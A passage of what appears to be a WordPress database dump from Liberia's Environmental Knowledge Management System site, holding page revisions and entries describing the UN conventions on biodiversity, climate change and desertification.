href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:32:38','2019-11-12 01:32:38','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1870,1,'2019-11-12 01:37:16','2019-11-12 01:37:16','The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on Biological Diversity is dedicated to promoting sustainable development.\r\n\r\nThe CBD was inspired by the world community’s growing commitment to sustainable development. It represents a dramatic step forward in the conservation of biological diversity, the sustainable use of its components, and the fair and equitable sharing of benefits arising from the use of genetic resources.\r\n\r\nWebsite: <a href=\"https://www.uncbd.int/\">www.uncbd.int</a>','United Nations Convention on Biological Diversity','','publish','closed','closed','','united-nations-convention-on-biological-diversity','','','2019-11-12 01:43:10','2019-11-12 01:43:10','',0,'https://ekmsliberia.info/?post_type=mea_resource&#038;p=1870',6,'mea_resource','',0),(1871,1,'2019-11-12 01:37:16','2019-11-12 01:37:16','The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on Biological Diversity is dedicated to promoting sustainable development.\r\n\r\nThe CBD was inspired by the world community’s growing commitment to sustainable development. It represents a dramatic step forward in the conservation of biological diversity, the sustainable use of its components, and the fair and equitable sharing of benefits arising from the use of genetic resources.','United Nations Convention on Biological Diversity','','inherit','closed','closed','','1870-revision-v1','','','2019-11-12 01:37:16','2019-11-12 01:37:16','',1870,'https://ekmsliberia.info/1870-revision-v1/',0,'revision','',0),(1872,1,'2019-11-12 01:40:44','2019-11-12 01:40:44','Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management.\r\n\r\nThe Convention addresses specifically the arid, semi-arid and dry sub-humid areas, known as the drylands, where some of the most vulnerable ecosystems and peoples can be found.\r\n\r\nWebsite: <a href=\"https://www.unccd.int/\">www.unccd.int</a>','United Nations Convention to Combat Desertification','','publish','closed','closed','','united-nations-convention-to-combat-desertification','','','2019-11-12 01:42:31','2019-11-12 01:42:31','',0,'https://ekmsliberia.info/?post_type=mea_resource&#038;p=1872',5,'mea_resource','',0),(1873,1,'2019-11-12 01:40:44','2019-11-12 01:40:44','Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management.\r\n\r\nThe Convention addresses specifically the arid, semi-arid and dry sub-humid areas, known as the drylands, where some of the most vulnerable ecosystems and peoples can be found.','United Nations Convention to Combat Desertification','','inherit','closed','closed','','1872-revision-v1','','','2019-11-12 01:40:44','2019-11-12 01:40:44','',1872,'https://ekmsliberia.info/1872-revision-v1/',0,'revision','',0),(1874,1,'2019-11-12 01:42:02','2019-11-12 01:42:02','Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management.\n\nThe Convention addresses specifically the arid, semi-arid and dry sub-humid areas, known as the drylands, where some of the most vulnerable ecosystems and peoples can be found.\n\nWebsite: <a href=\"https://www.unccd.int/\">www.unccd.int</a>','United Nations Convention to Combat Desertification','','inherit','closed','closed','','1872-autosave-v1','','','2019-11-12 01:42:02','2019-11-12 01:42:02','',1872,'https://ekmsliberia.info/1872-autosave-v1/',0,'revision','',0),(1875,1,'2019-11-12 01:42:31','2019-11-12 01:42:31','Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management.\r\n\r\nThe Convention addresses specifically the arid, semi-arid and dry sub-humid areas, known as the drylands, where some of the most vulnerable ecosystems and peoples can be found.\r\n\r\nWebsite: <a href=\"https://www.unccd.int/\">www.unccd.int</a>','United Nations Convention to Combat Desertification','','inherit','closed','closed','','1872-revision-v1','','','2019-11-12 01:42:31','2019-11-12 01:42:31','',1872,'https://ekmsliberia.info/1872-revision-v1/',0,'revision','',0),(1876,1,'2019-11-12 01:43:10','2019-11-12 01:43:10','The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on Biological Diversity is dedicated to promoting sustainable development.\r\n\r\nThe CBD was inspired by the world community’s growing commitment to sustainable development. It represents a dramatic step forward in the conservation of biological diversity, the sustainable use of its components, and the fair and equitable sharing of benefits arising from the use of genetic resources.\r\n\r\nWebsite: <a href=\"https://www.uncbd.int/\">www.uncbd.int</a>','United Nations Convention on Biological Diversity','','inherit','closed','closed','','1870-revision-v1','','','2019-11-12 01:43:10','2019-11-12 01:43:10','',1870,'https://ekmsliberia.info/1870-revision-v1/',0,'revision','',0),(1877,1,'2019-11-12 01:44:46','2019-11-12 01:44:46','The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal membership. The 197 countries that have ratified the Convention are called Parties to the Convention. The UNFCCC is a “Rio Convention”, one of three adopted at the “Rio Earth Summit” in 1992.\r\n\r\nIts sister Rio Conventions are the UN Convention on Biological Diversity and the Convention to Combat Desertification. The three are intrinsically linked.\r\n\r\nWebsite: <a href=\"https://www.unfccc.int/\">www.unfccc.int</a>','United Nations Framework Convention on Climate Change','','publish','closed','closed','','united-nations-framework-convention-on-climate-change','','','2019-11-15 12:12:33','2019-11-15 12:12:33','',0,'https://ekmsliberia.info/?post_type=mea_resource&#038;p=1877',4,'mea_resource','',0),(1878,1,'2019-11-12 01:44:46','2019-11-12 01:44:46','The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal membership. The 197 countries that have ratified the Convention are called Parties to the Convention. The UNFCCC is a “Rio Convention”, one of three adopted at the “Rio Earth Summit” in 1992.\r\n\r\nIts sister Rio Conventions are the UN Convention on Biological Diversity and the Convention to Combat Desertification. The three are intrinsically linked.\r\n\r\nWebsite: <a href=\"https://www.unfccc.int/\">www.unfccc.int</a>','United Nations Convention on Biological Diversity','','inherit','closed','closed','','1877-revision-v1','','','2019-11-12 01:44:46','2019-11-12 01:44:46','',1877,'https://ekmsliberia.info/1877-revision-v1/',0,'revision','',0),(1879,1,'2019-11-12 01:46:08','2019-11-12 01:46:08','The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal membership. The 197 countries that have ratified the Convention are called Parties to the Convention. The UNFCCC is a “Rio Convention”, one of three adopted at the “Rio Earth Summit” in 1992.\r\n\r\nIts sister Rio Conventions are the UN Convention on Biological Diversity and the Convention to Combat Desertification. The three are intrinsically linked.\r\n\r\nWebsite: <a href=\"https://www.unfccc.int/\">www.unfccc.int</a>','United Nations Framework Convention on Climate Change','','inherit','closed','closed','','1877-revision-v1','','','2019-11-12 01:46:08','2019-11-12 01:46:08','',1877,'https://ekmsliberia.info/1877-revision-v1/',0,'revision','',0),(1880,1,'2019-11-12 01:50:05','2019-11-12 01:50:05','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:50:05','2019-11-12 01:50:05','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1882,1,'2019-11-12 01:56:47','2019-11-12 01:56:47','<h1>Conventions & Protocols</h1>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 01:56:47','2019-11-12 01:56:47','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1883,1,'2019-11-12 02:01:53','2019-11-12 02:01:53','<h1>Conventions & Protocols</h1>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March...<a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:44:46+00:00\" title=\"2019-11-12T01:44:46+00:00\">November 12, 2019</time></a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally...<a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:40:44+00:00\" title=\"2019-11-12T01:40:44+00:00\">November 12, 2019</time></a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio...<a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:37:16+00:00\" title=\"2019-11-12T01:37:16+00:00\">November 12, 2019</time></a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:01:53','2019-11-12 02:01:53','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1884,1,'2019-11-12 02:02:10','2019-11-12 02:02:10','<h1>Conventions & Protocols</h1>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:44:46+00:00\" title=\"2019-11-12T01:44:46+00:00\">November 12, 2019</time></a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:40:44+00:00\" title=\"2019-11-12T01:40:44+00:00\">November 12, 2019</time></a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:37:16+00:00\" title=\"2019-11-12T01:37:16+00:00\">November 12, 2019</time></a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:02:10','2019-11-12 02:02:10','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1885,1,'2019-11-12 02:02:36','2019-11-12 02:02:36','<h1>Conventions & Protocols</h1>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:44:46+00:00\" title=\"2019-11-12T01:44:46+00:00\">November 12, 2019</time></a><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:40:44+00:00\" title=\"2019-11-12T01:40:44+00:00\">November 12, 2019</time></a><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:37:16+00:00\" title=\"2019-11-12T01:37:16+00:00\">November 12, 2019</time></a><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:02:36','2019-11-12 02:02:36','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1886,1,'2019-11-12 02:03:15','2019-11-12 02:03:15','<h1>Conventions & Protocols</h1>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:03:15','2019-11-12 02:03:15','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1888,1,'2019-11-12 02:10:08','2019-11-12 02:10:08','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a 